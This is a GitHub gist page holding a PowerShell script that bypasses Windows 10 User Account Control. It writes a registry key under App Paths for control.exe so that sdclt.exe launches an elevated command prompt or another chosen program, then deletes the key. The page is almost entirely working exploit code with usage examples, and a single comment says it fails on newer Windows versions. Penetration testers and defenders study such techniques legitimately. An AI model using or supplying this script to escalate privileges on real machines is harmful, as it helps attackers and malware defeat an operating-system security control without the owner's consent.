Skip to content

Instantly share code, notes, and snippets.

@netbiosX netbiosX/Sdclt.ps1
Last active Jul 31, 2019

Embed
What would you like to do?
Bypass UAC via sdclt in Windows 10 systems
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
 
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
and starts an elevated command prompt.
 
.NOTES
Function : SdcltUACBypass
File Name : SdcltUACBypass.ps1
Website : pentestlab.blog
 
.LINKS
https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/
https://gist.github.com/netbiosX/54a305a05b979e13d5cdffeba5436bcc
 
.EXAMPLE
 
Open Command Prompt (it's default):
SdcltUACBypass
 
Open specific application:
SdcltUACBypass -program "cmd.exe"
#>
function SdcltUACBypass(){
Param (
[String]$program = "C:\Windows\System32\cmd.exe" #default
)
 
#Create Registry Structure
New-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Name "(default)" -Value $program -Force
 
#Start sdclt.exe
Start-Process "C:\Windows\System32\sdclt.exe" -WindowStyle Hidden
 
#Cleanup
Start-Sleep 3
Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Recurse -Force
 
}
@ghost

This comment has been minimized.

Copy link

commented Apr 15, 2019

doesn't work in new Windows 10 versions

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.